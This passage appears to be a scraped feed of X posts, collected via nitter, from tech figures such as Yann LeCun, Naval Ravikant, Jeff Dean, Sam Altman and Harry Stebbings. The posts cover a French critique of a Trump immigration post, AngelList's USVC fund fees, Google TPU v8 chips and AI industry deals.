vient de publier sur Truth Social un monologue de 1 500 mots sur le droit du sol, l'ACLU, les Indiens, les Chinois et la \"Savage Nation\". Ce texte inhabituellement long, inhabituellement cohérent, mérite une lecture attentive. Il révèle bien plus qu'une opinion sur l'immigration.\n\n▶️ Commençons par l'évidence que tout le monde remarque : ce texte n'a pas été écrit par Donald Trump.\nTrump écrit en majuscules intempestives, en phrases courtes, avec des digressions abruptes et une syntaxe chaotique. Ce texte est long, structuré, argumenté, avec une progression rhétorique délibérée, une introduction, des exemples, une montée en puissance émotionnelle, une conclusion en appel à l'action. C'est la marque de fabrique de Stephen Miller, architecte de la politique migratoire de Trump depuis dix ans, dont l'organisation America First Legal est précisément celle qui a construit les arguments juridiques soumis à la Cour Suprême. \n\nMiller rédige. Trump signe. C'est une mécanique documentée depuis des années.\n\n▶️ Ce qui rend ce texte particulièrement remarquable, c'est son timing et son objectif.\n\nLe 1er avril, Trump a assisté en personne aux plaidoiries de la Cour Suprême sur le droit du sol, la première fois dans l'histoire américaine qu'un président en exercice assiste à des arguments oraux devant la Cour. \n\nLa majorité des juges, y compris ceux nommés par Trump lui-même, ont exprimé un scepticisme marqué.\n\nCe post fleuve publié dans les jours suivants n'est pas une réflexion spontanée. C'est une tentative d'influencer l'opinion publique, et peut-être les juges eux-mêmes, avant que la décision ne tombe en juin. \n\nVenons-en aux affirmations les plus choquantes du texte, point par point.\n\n▶️ \"Nous sommes le seul pays au monde assez stupide pour autoriser le droit du sol.\" C'est factuellement faux. Une trentaine de pays garantissent la citoyenneté aux enfants nés sur leur territoire, dont le Canada, le Mexique, le Brésil et l'Argentine. \n\n▶️ Trump écrit en substance que les Indiens et les Chinois qu'il qualifie de \"gangsters with laptops\", occupent toutes les places dans la tech californienne, que les Blancs n'ont plus leur chance, et que ce n'est plus leur pays. \n\nLes ingénieurs d'origine indienne et chinoise sont les architectes de l'économie technologique américaine, la même économie dont Trump se félicite en permanence. Google, Microsoft, Adobe, IBM, Palo Alto Networks, Arista Networks : autant de géants américains dirigés par des PDG d'origine indienne. \n\nSelon le rapport Stanford HAI 2026, les États-Unis investissent 285 milliards en IA et 80% des chercheurs en IA américains sont nés à l'étranger. Expulser ou décourager ces populations, c'est amputer l'innovation américaine au bénéfice de la Chine, l'adversaire que Trump prétend combattre.\n\n▶️ L'ACLU (American Civil Liberties Union, organisation fondée en 1920 pour défendre les libertés constitutionnelles américaines) est qualifiée \"d'organisation criminelle, la plus dangereuse de l'histoire des États-Unis,\" plus dangereuse que l'Iran. Trump écrit qu'elle \"a fait plus de dégâts à ce pays que l'Iran n'en a jamais fait\" et appelle à la poursuivre sous une loi antimafia. \n\n▶️ \"Le melting pot est terminé. C'est juste une marmite à cash.\" Le melting pot (le creuset en français), est le mythe fondateur de l'identité américaine depuis deux siècles. Lithuaniens, Roumains, Russes, Polonais, Italiens : Trump les cite lui-même comme exemples de bonnes intégrations. Il oublie de mentionner que ces vagues migratoires européennes ont elles aussi été accueillies avec les mêmes discours : les Irlandais traités de sous-humains, les Italiens lynchés, les Polonais moqués pour leur manque de loyauté. L'histoire se répète. Seule la nationalité des boucs émissaires change.\n\n📕 Dans Le Pantin de la Maison Blanche, j'analyse comment Stephen Miller, idéologue de l'immigration ethno-nationaliste depuis vingt ans, utilise Trump comme amplificateur de sa vision du monde. Ce texte en est la démonstration la plus pure.\n\nL'Amérique a été construite par les enfants de ceux que ce texte veut expulser. Jensen Huang, NVIDIA, l'entreprise qui alimente la révolution IA mondiale, est né à Taïwan. Sundar Pichai, Google, est né en Inde. Satya Nadella, Microsoft, est né en Inde. Chacun d'eux est le produit d'une Amérique qui croyait encore à la vertu de ce fameux meltin pot. Ce texte leur dit que cette Amérique est terminée.\n\n📖 Le Pantin de la Maison Blanche → https://www.amazon.fr/dp/B0GPCCMS68/", + "url": "https://x.com/ylecun/status/2047565736382534091", + "published_at": "2026-04-24T06:38:08+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/avlok/status/204754692…", + "url": "https://x.com/naval/status/2047550896670908809", + "published_at": "2026-04-24T05:39:10+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: I’ve seen a lot of questions about USVC, AngelList’s newest product. First, don’t invest in venture capital if you can’t afford to lose your money. Put your savings somewhere safer. But if you’re considering USVC, here’s a thread that answers the most common questions and explains how it works:", + "url": "https://x.com/naval/status/2047546920747307466", + "published_at": "2026-04-24T05:23:22+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I've been thinking about local LLMs a lot these days.", + "url": "https://x.com/liuliu/status/2047527371486658814", + "published_at": "2026-04-24T04:05:41+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Hari nails it:\n\n“Don’t listen to people who don’t know how private markets work.”", + "url": "https://x.com/naval/status/2047520212787015748", + "published_at": "2026-04-24T03:37:14+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/haridigresses/status/2…", + "url": "https://x.com/naval/status/2047519250433421604", + "published_at": "2026-04-24T03:33:25+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/nivi/status/2047471220…", + "url": "https://x.com/naval/status/2047510419565420779", + "published_at": "2026-04-24T02:58:19+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "New life plan-\n \nMove to Brooklyn\nGet neck tat\nRide bike everywhere\nCold brew own coffee (also start drinking coffee)\nAdopt 12 year old stray cat, name him Nietzsche\nVape mango pods, but ironically\nWear scarf everywhere during summer", + "url": "https://x.com/eladgil/status/2047489459378397604", + "published_at": "2026-04-24T01:35:02+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: USVC is a new fund being offered by Naval, it's been discussed widely on X. I have some thoughts and why people should look into it. I have no connection with it and not being paid to shill. \n\nBack when I started dating my wife, I told her to set up a Roth IRA and buy Apple. Every year, I'd have her put the max limit into a Roth IRA and buy Apple. Apple was $20 or so. When I checked it earlier this year, I was blown away. It was a small mount of money that grew into something nice.\n\nApple, Facebook, Nvidia, Tesla, etc. would IPO early. You could have MASSIVE outsized gains if you were investing in the early 2010's. \n\nYou couldn't get into them pre-IPO unless you had a connection. There are people on this site who pretend to be geniuses because a friend hooked them up with a tag-along investment into the seed round of Uber. It was a bro favor, good for them, they do leave that part out tho and let the false narrative of being a genius investor flow through. \n\nYou used to be able to buy in pre-IPO with a small check. Now it's almost impossible unless you have a friend, and they set up an SPV, they are usually doing you a favor, because huge funds and institutional investors gobble it all up. (This has also lead to the VC class screwing themselves over, because if you can't buy today's version of Apple at $20, because all the big gains are sucked up before the public offering, then why do you have buy in into this entire system?)\n\nYou could, as a small investor, get huge results pre-IPO via a small check, or also do well after the IPO, because companies IPO'ed earlier. Ie Apple at $20, Amazon in the 20's, etc.\n\nIt's very hard to get big gains now, because companies remain private much longer. Many companies don't want to IPO and then deal with the hassle of lawfare. Look at what happened to Elon in Delaware. \n\nFor us, as an ordinary person, this means that by the time a company goes public, we are \"last money in.\" This is why I always tell friends and family to buy SPY (or FXAIX) and QQQM. Don't day trade. You won't beat the market. (Everyone who claims they do are lying, they use a short timeline and never mention all of the losing trades. Or they are insider trading or beating the market by a relatively small amount. For most of us, day trading is the way of death.) \n\nWith USVC, regular people can get into some of the companies that will IPO, eventually, at high valuations still, but pre-IPO.\n\nI've read all of the negative commentary about the fund. I don't understand the \"illiquid\" complaint. If you started your own business and bought equipment, you wouldn't be paying yourself. If you really had to expand, you might not pay yourself for years. When you put your money in, it's locked up, you grow out the company for several years. Hopefully you can afford to pay yourself after a couple of years. If you QSBS'ed it, maybe you sell in 5-10. Who knows. In the meantime, yes, your money is gone. Every business owner knows this feeling. Your company is \"worth\" some amounts on paper, and you pay yourself a salary to live on. That's if things are going well.\n\nThere's also a lot of discussion around carry and fees. The question is will those fees be less than what the post-IPO price of the companies will be is. That's up to everyone to decide for themselves.\n\nIn any case, I have no financial interest into this fund. I am not telling you to buy into or not. \n\nI do like to flag stuff like this for people who read me, operating under the rule that, \"Cerno writes for the version of Cerno who did not understand any of this stuff, but sure would have liked to have.\" As an example, I didn't know what QSBS was until it was too late. [Frown face.] \n\nAnd I didn't buy Tesla at $2 [panic attack], despite wanting to, because a financial adviser friend told me, \"You shouldn't invest on a feeling, you don't have any edge here.\" \n\nI would tell my prior self: You can't invest EVERYTHING based on vibes, but you can and should absolutely do so now and then. (Note: If you have an addictive personality, this is bad advice. But I am only addicted to X and See's Candies.)\n\nBut I will post the negative comments about the fund. I don't want anyone to ever read me and obtain bad information.\n\nEveryone has to decide for themselves what to do.\n\nI've also learned from experience that if something goes well, nobody sends me money or a box of cigars as a thank you. It was their brilliance that led them to the big gains. If it goes wrong, then the fault is all mine and people hate me for it.\n\nThat's also why I don't even want to post about the fund at all, but here goes.", + "url": "https://x.com/naval/status/2047481012826124516", + "published_at": "2026-04-24T01:01:28+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: Today we open sourced many of OpenAI's monitorability evaluations. We hope that the research community and other model developers can build upon them and use them to evaluate the monitorability of their own models.\n\nhttps://alignment.openai.com/monitorability-evals/", + "url": "https://x.com/sama/status/2047473914528563592", + "published_at": "2026-04-24T00:33:16+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "R to @Svwang1: 历史读得少的后果,是视野比较狭隘,看得不够远,对于因果链条比较长的事物无法正确理解,因此选择了错误的解释和预测体系。这进一步导致在关键转折点时作出错误选择,在本可低成本提早布局的时刻过于迟钝。", + "url": "https://x.com/svwang1/status/2047472537488302502", + "published_at": "2026-04-24T00:27:47+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: I spent the morning digging into USVC fees.\n\nTLDR: In my opinion, there is no lower-cost way to invest in VC other than becoming one. I’m expecting to pay the same or less than it costs to invest in a good VC fund. And a lot less than investing in a fund-of-funds. All while getting the benefits of a fund-of-funds that can do direct, secondary, and fund investments.\n\nCarry. If USVC invests in a fund or SPV, I will pay that manager’s ~20% carry. That’s what I expected. All fund-of-funds do it this way. I’m glad to pay carry to invest with good managers. USVC doesn’t charge additional carry.\n\nDirect investments. There is no underlying carry on USVC’s direct investments and they aim to make this a major portion of the portfolio. This would bring down the blended cost of USVC substantially, compared to a VC fund.\n\nFees. The annual fee in the first year is capped at 2.5%. This includes the fees of the underlying funds that USVC invests in, which is a huge deal. Just investing in a VC fund costs 2-2.5% a year. Also, the fee would be 3.6% but AngelList is subsidizing it in the first year.\n\nThere’s a possibility the annual fee could go up in the future and I’ve told the team that this is extremely confusing and weird, and they are working on it with haste.\n\nOverall, I’m expecting to pay the same or less than it costs to invest in a good VC fund, but I’m actually getting access to a fund-of-funds that can do direct, secondary, and fund investments. A typical fund-of-funds charges another 1/10 (fees/carry) on top of the VC’s 2/20, for a total of 3/30.\n\nSome other things I learned:\n\nEarly-stage. Early-stage deals are planned. I would rather invest now in case those early-stage investments get marked up quickly. These deals will be riskier and more illiquid, so there’s no free lunch here. The current portfolio includes late-stage (OpenAI, Anthropic, xAI) and mid-stage (Sierra, Vercel, Crusoe, Legora).\n\nIlliquidity. This is venture capital. The underlying investments are illiquid. Don’t invest if you’re uncomfortable with illiquidity. That said, USVC is working on redemptions of up to 5% of the fund every quarter. It’s not guaranteed, but if it’s offered, you can choose to get partial liquidity along the way.\n\nInternational. There is a lot of demand from international investors. USVC is not yet set up to accept international investors at scale, but they’re working on it.\n\nSales load. There is no sales load. USVC is only available on usvc dot com and the sales load is waived if you buy through the site. In the future, brokers that list USVC may charge up to a ~3% sales load; that’s how they make their money.\n\nDisclosure: I’m a co-founder of AngelList and have shares in the business.", + "url": "https://x.com/naval/status/2047471220451578132", + "published_at": "2026-04-24T00:22:33+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "多看历史的一个好处是可以给自己开各种上帝视角,枯燥无聊或者低谷期时可以拥有乐观的想象力,顺风顺水时仍然保持谨慎而不得意忘形。", + "url": "https://x.com/svwang1/status/2047470402725921150", + "published_at": "2026-04-24T00:19:18+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Why the biggest fintech players are in for a shock.\n\n\"The shift is from human UX to agent UX.\n\nIn the past, you won with dashboards, design and user experience.\n\nNow, the buyer is an AI agent, and it only cares about APIs, performance and integration.\n\nThat breaks traditional moats and puts even the biggest fintech players at risk.\" @jasonlk\n\nLove to hear your thoughts @pedroh96 @awxjack @sebatklarna @fintechjunkie", + "url": "https://x.com/HarryStebbings/status/2047461264998478113", + "published_at": "2026-04-23T23:43:00+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump completely passed out, reawakened, then passed out again during today's pressor in the Oval Office. 😂🤣👇", + "url": "https://x.com/ylecun/status/2047454244781818205", + "published_at": "2026-04-23T23:15:06+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I used to think MAUs and WAUs were the dumbest metric. Now I think it's the most important.\n\n\"I used to think MAUs and WAUs did not matter, now I think they are critical.\n\nIn the AI era, usage is the leading indicator of value.\n\nIf your usage is growing faster than revenue, you are building something people truly want.\" @jasonlk\n\nLove to hear your thoughts on this @joshelman @kirbyman01 @Joshuabrowder @an21m @mignano and how your thoughts on what matters changed?", + "url": "https://x.com/HarryStebbings/status/2047426032840634830", + "published_at": "2026-04-23T21:23:00+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: How does one make sense of SF?\n\nWe are living through the craziest computing revolution of the last 2 decades....and 95% of the value being created is within a 4-mile radius in SF (h/t @eladgil )\n\nIt's just hard to understand....why is the concentration so high?\n\nWhat is it about this place? There are good reasons that people will offer...good universities, great companies, talent networks, venture capital yada yada yada\n\nBut all of that is hard to emotionally understand.\n\nI tend to try to answer these questions through my own lived experience.\n\nTwo things happened this week that brought it home for me.\n\nOn Wed evening, two GOATS of the design world (@soleio and @rsms ) did a design talk at SPC.\n\nI saw some other GOATS at the talk (@aaron_ , @benbarry )\n\nAnd you realize that these GOATS are just so curious about the world. They just want to build and learn. And give back. And with an air of humility and passion. It's so so cool and inspiring.\n\nAnd then this week we had someone release a mind-bendingly amazing demo of every pixel being generated.\n\nhttps://x.com/zan2434/status/2046982383430496444\n\nPeople were blown away but @eddiejiao_obj and @zan2434 had been jamming creatively for a bunch of time @southpkcommons . \n\nAnd in that entire time, they were surrounded by a culture and environment and ecosystem that says \"that is crazy but my god, if it works, then what could happen\"\n\nThere is wonder, amazement and curiosity.\n\nAnd passion.\n\nI wish this city were cleaner and better governed (but Dan Lurie is crushing).\n\nWe are so lucky to be surrounded by weirdos who love to build.\n\nThis is why we are who we are.", + "url": "https://x.com/eladgil/status/2047421448449630379", + "published_at": "2026-04-23T21:04:47+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Slightly soppy bromance post but Jason believed in me when I was 18 and at law school still. \n\nThere were next to no signs 20VC was or would be a success. \n\nHe has been a dear friend ever since!", + "url": "https://x.com/HarryStebbings/status/2047413285675290984", + "published_at": "2026-04-23T20:32:21+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: It's worth pointing out that we have been pushing on large-scale training and asynchronous techniques for the last ~14 years. Here's our NeurIPS 2012 paper where we demonstrated that this approach could be used to train very large neural networks (for the time: 30X larger than any previous neural network), and to spread the training out across thousands of machines in a fault-tolerant manner.\n\nPDF: https://static.googleusercontent.com/media/research.google.com/en//archive/large_deep_networks_nips2012.pdf\n\nhttps://static.googleusercontent.com/media/research.google.com/en//archive/large_deep_networks_nips2012.pdf\n\n(This paper doesn't get as much attention because we neglected to put it on Arxiv at the time: oops!)", + "url": "https://x.com/JeffDean/status/2047408945950802186", + "published_at": "2026-04-23T20:15:06+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: TPU 8i is co-designed with our Gemini research team to support low latency inference. Among the attributes that support this are large amounts of on-chip SRAM, enabling more computations to be done on chip without having to go to HBM for weights or KVCache state as often.\n\nThe boardfly network topology (see image below) offers a much lower diameter network to connect all 1152 chips in an 8i pod, by fully connecting all 4 chips on the board together, fully connecting groups of 8 boards together, and then fully connecting 36 groups of 8 boards together. In addition, there is specialized Collectives Acceleration Engine (CAE) circuitry on each chip to offload various kinds of reductions and other global operations from the main computational portion of each chip, reducing on-chip latency by up to 5x.\n\nTogether, these features will offer very high throughput for large-scale models (including MoEs, which often require mapping onto many chips for inference), and will do so at very low latency. This will make agentic workloads and interactive usage really shine on the TPU 8i.", + "url": "https://x.com/JeffDean/status/2047407537566495033", + "published_at": "2026-04-23T20:09:30+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: First, let's talk about TPU 8t, which is designed for large-scale training and inference throughput.\n\nThe pod size is increased slightly to 9600 chips, and provides ~3X the FP4 performance per pod vs. Ironwood (8t has 121 exaflops/pod vs. 42.5 exaflops/pod for Ironwood). In addition, the ICI network bandwidth is 2X higher per chip and the scale out datacenter networking is 4X higher per chip.\n\nImportantly, this system also offers 2X the performance / watt, continuing the trend of significant energy effiency improvements that we've had for many generations of TPUs (8t offers ~60X the performance/watt as TPU v2).", + "url": "https://x.com/JeffDean/status/2047405389856297387", + "published_at": "2026-04-23T20:00:58+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "I had a good time discussing yesterday's Google TPU v8t and v8i announcement at Cloud Next with Amin Vahdat along with @AcquiredFM hosts @gilbert\nand @djrosent.\n\nThe blog post announcement has lots of details about these new chips:\n\nhttps://blog.google/innovation-and-ai/infrastructure-and-cloud/google-cloud/eighth-generation-tpu-agentic-era/\n\nHere's a thread of some particular things I'm excited about:", + "url": "https://x.com/JeffDean/status/2047403921912873257", + "published_at": "2026-04-23T19:55:08+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "\"don't retweet this, don't retweet this, don't retweet this...\"\n\nah fuck it, life imitates art.", + "url": "https://x.com/sama/status/2047403771416940715", + "published_at": "2026-04-23T19:54:32+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "We tried a new thing with NVIDIA to roll out Codex across a whole company and it was awesome to see it work.\n\nLet us know if you'd like to do it at your company!", + "url": "https://x.com/sama/status/2047395562501411058", + "published_at": "2026-04-23T19:21:55+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "embers", + "url": "https://x.com/sama/status/2047392357482639749", + "published_at": "2026-04-23T19:09:11+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: there are early signs of 5.5 being a competent ai research partner. several researchers let 5.5 run variations of experiments overnight given only a high level algorithmic idea, wake up to find completed sweep dashboards and samples, never having touched code or a terminal at all", + "url": "https://x.com/sama/status/2047386955550470245", + "published_at": "2026-04-23T18:47:43+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: New in the Codex app:\n\n- GPT-5.5\n- Browser control\n- Sheets & Slides\n- Docs & PDFs\n- OS-wide dictation\n- Auto-review mode\n\nEnjoy!", + "url": "https://x.com/sama/status/2047381565534322694", + "published_at": "2026-04-23T18:26:18+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: This study is an important part of Vanishing Culture, the new book OUT TODAY from @internetarchive. 🕳️\n\nRead for free or purchase in print ➡️ https://archive.org/details/vanishing-culture-2026", + "url": "https://x.com/ylecun/status/2047378161860776085", + "published_at": "2026-04-23T18:12:46+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I still think on usability-wise, there is a big gap between \"your thing in the training data\" v.s. \"your thing in the SKILL.md\". Prove me wrong otherwise.", + "url": "https://x.com/liuliu/status/2047374234004115719", + "published_at": "2026-04-23T17:57:10+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Entrepreneurship is a distributed search job across the surface of commercial opportunities", + "url": "https://x.com/eladgil/status/2047373700643844303", + "published_at": "2026-04-23T17:55:03+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Does the $60BN Cursor Deal Make Sense:\n\n\"It actually makes sense when you look at what each side lacks.\n\nOne has explosive revenue but weak margins due to compute and model costs.\n\nThe other has massive compute and models but no real revenue.\n\nPut them together and it solves both problems.\" @rodriscoll\n\nLove to hear your thoughts on this @levie @ttunguz @matanSF @shaunmmaguire @beffjezos @martin_casado", + "url": "https://x.com/HarryStebbings/status/2047371926335857036", + "published_at": "2026-04-23T17:48:00+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Big congrats", + "url": "https://x.com/eladgil/status/2047365014500389353", + "published_at": "2026-04-23T17:20:32+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "My view is the AI boom will only accelerate and is a once in a lifetime transformation\n\nThis is orthogonal to whether many AI companies should exit in next 12-18 months, as some may lack durability vs labs, new entrants, or weird market shifts\n\nhttps://www.businessinsider.com/ai-startup-founders-warning-elad-gilsell-while-boom-lasts-2026-4", + "url": "https://x.com/eladgil/status/2047364865527075139", + "published_at": "2026-04-23T17:19:56+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "It is a very expensive desire to be a value investor today. \nIt is much easier to be a momentum investor, that is for sure.", + "url": "https://x.com/HarryStebbings/status/2047358263868436791", + "published_at": "2026-04-23T16:53:42+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "It's been a delight to provide small amounts of advice and suggestions to people working on the Decoupled DiLoCo training system. This approach enables graceful handling of failures in large scale training jobs, by allowing (N-1) / N units to proceed when one fails.\n\nThread ⬇️", + "url": "https://x.com/JeffDean/status/2047339995682529313", + "published_at": "2026-04-23T15:41:07+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: We launched USVC yesterday and it was one of the most fun days of my career\n\nThousands of people ended up subscribing for literally tens of millions of dollars\n\nWhile most of the reception was positive, there was some interrogation on a few important topics:\n\n1 - The USVC fee structure\n2 - The Investment Strategy\n3 - Support for International Investors\n\nLet's talk about them\n\nThe USVC Fee Structure\n\nIf you have followed me for any amount of time, you'll know this is a personal topic for me.\n\nI've frequently complained about fees in financial services. From VC funds to wealth advisors, I've taken no prisoners in calling these out.\n\nThe last venture capital fund I ran was the only VC fund I know of that raised more than 50M and didn't charge a penny of management fees.\n\nSo how much does USVC actually charge and why it is so much?\n\nUSVC costs 2.5% all-in to investors today\n\nThere are some misconceptions based on reading our prospectus, including:\n\n- A 3% sales load\nPlatforms that offer USVC could charge this if they wanted, but we don't. If you buy on http://USVC.com as everyone yesterday did, you pay no sales load.\n\n- Underlying fund fees\nEarly investments from USVC have been in funds that have their own fees, and these fees are paid by USVC. However, these management fees are already included in the net expense ratio of 2.5%.\n\nIn time, I'm planning to move a meaningful chunk of the portfolio to be direct investments in startups on the cap table which will have 0 underlying fees or carry.\n\nThe 2.5% fee is inclusive of everything, including our management fee.\n\n- The advertised 3.61% today\nRight now, even though you pay 2.5%, it costs us 3.61% to service this product.\n\nThere are two big reasons for this - the underlying fund fees (which we're working to improve with direct investments) and the fact that operationally running these types of funds is very expensive.\n\nWe've decided to absorb the fees excess of 2.5% for at least the first year.\n\nDuring the time, we're going to make more efficient investments and wait for economies of scale to kick in on operational costs.\n\nNow... you may ask: isn't 2.5% still very expensive?\n\nThe answer is... it depends.\n\nTop venture capital firms charge that just on their management fees, and force you to pay that for 10 years.\n\nAnd then they charge 20% of profits on top of that!\n\nWe charge no carry on our direct investments at all, which makes this 2.5% fee attractive for the asset class.\n\nIt's ironic to call this a cash grab when we are subsidizing this product out of our pocket to keep the fees in line\n\nI encourage everyone to go read the full disclosures and prospectus at http://usvc.com.\n\nStay tuned for Part 2 later today on Investment Strategy", + "url": "https://x.com/naval/status/2047334901033123913", + "published_at": "2026-04-23T15:20:52+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: The most dangerous thing in Washington right now isn't just the corruption—it's the retaliation against the people who expose it. When government power is used in ways that appear designed to intimidate a journalist for revealing potential abuses, the message is unmistakable: be quiet or be targeted. That’s how fear replaces truth. That’s how a free press is pushed toward silence. And that’s how democracies start to collapse.", + "url": "https://x.com/ylecun/status/2047321581966291154", + "published_at": "2026-04-23T14:27:57+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "R to @HarryStebbings: Spotify 👉 https://open.spotify.com/episode/6EjWkbt83H2WXhDMjjS7PF\nYoutube 👉 https://youtu.be/s61XVZAt5ns\nApple Podcasts 👉 https://podcasts.apple.com/us/podcast/20vc-cursor-acquired-for-%2460bn-by-xai-anthropic-hits/id958230465?i=1000763211245", + "url": "https://x.com/HarryStebbings/status/2047316269465006363", + "published_at": "2026-04-23T14:06:50+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "This is the big f**king deal.\n\nCursor acquired for $60BN by xAI\n\nI sat down with @jasonlk and @rodriscoll to discuss the deal, along with the biggest news in tech this week:\n\n- Anthropic Hits $1TRN in Secondary Markets\n- Anthropic Launches Claude Code\n- Rippling Hits $1BN in ARR\n- Cerebras Files for IPO\n\nMy notes below:\n\n1. This $60B deal actually makes sense\n\nThe potential $60 billion acquisition of Cursor by xAI/SpaceX is an industrial \"marriage made in heaven\". Cursor has an exploding business with billions in ARR but \"shitty\" gross margins because they lack their own compute and models. Elon Musk has the massive Colossus GPU data center and a model (Grok) but effectively no revenue, making the vertical integration of these two companies a strategic fix for both.\n\n2. How Claude Design Will Hurt Figma\n\nAnthropic’s Claude Design is a full design application, not just a set of prompts or skills. It poses an existential threat because it allows product and engineering teams to bypass the traditional 30-day designer turnaround. By enabling \"normal people\" to design and move into production immediately, it will \"maim and nibble\" at Figma’s growth over the coming quarters.\n\n3. I used to think MAUs and WAUs were the dumbest metric. Now I think it's the most important.\n\nIn the B2B world, usage metrics like MAUs, WAUs, and DAUs are now more critical than revenue. If usage isn't growing faster than revenue, it's a sign of a struggling startup or \"stealth churn,\" where users have stopped active engagement despite the company still collecting fees. In the AI age, the ultimate test of a product's value is whether people are actually using its AI features daily.\n\n4. Why the biggest fintech players are in for a shock.\n\nExisting moats for fintech giants like Brex and Ramp are weakening as the selection criteria for vendors shifts. Customers are no longer prioritizing a dashboard's UI; they care which API works best with their autonomous AI agents. If a new vendor offers a superior API that allows an \"AI VP of Finance\" to automate tasks like collections, companies will switch vendors in a single week.\n\n5. Agent fabric is the layer that manages all your agents\n\nThe defining 2027 challenge is the \"agent fabric\". The infrastructure needed to manage and secure hundreds of autonomous agents. This gives a massive advantage to incumbents like Salesforce. They are positioning themselves as the trusted governance layer to guardrail agents and prevent them from going rogue", + "url": "https://x.com/HarryStebbings/status/2047316267858645088", + "published_at": "2026-04-23T14:06:50+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: Incredible work by Sony published in @Nature today! 🏓\n\nThey’ve built “Ace”, an autonomous ping-pong robot that uses RL and Sony’s vision sensors to achieve expert-level play in ping pong. A huge leap forward for adaptive robotics.\n\nhttps://www.nature.com/articles/s41586-026-10338-5", + "url": "https://x.com/soumithchintala/status/2047191747793649805", + "published_at": "2026-04-23T05:52:02+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: Kimi K2.6, the new state-of-the-art open-weight model from Moonshot, is now available for Pro and Max subscribers.", + "url": "https://x.com/AravSrinivas/status/2047145172337836139", + "published_at": "2026-04-23T02:46:57+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: Full article:\n\nhttps://www.foxnews.com/politics/anthropics-moral-compass-architect-suggested-ai-overcorrection-could-address-historical-injustices", + "url": "https://x.com/DavidSacks/status/2047104229773279572", + "published_at": "2026-04-23T00:04:16+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David 